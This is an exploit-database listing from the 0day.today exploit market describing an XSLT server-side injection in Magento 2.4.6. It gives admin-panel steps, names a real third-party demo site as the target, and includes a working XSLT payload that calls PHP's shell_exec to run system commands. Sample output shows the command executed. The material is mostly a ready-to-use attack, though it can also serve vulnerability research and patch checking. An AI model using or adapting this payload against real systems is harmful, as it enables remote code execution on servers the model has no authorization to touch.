[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Magento 2.4.6 XSLT Server Side Injection Vulnerability

Author
tmrswrr
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39153
Category
web applications
Date add
20-11-2023
Platform
multiple
# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6

## POC

1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>```

##RESULT
  
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

#  0day.today [2024-11-04]  #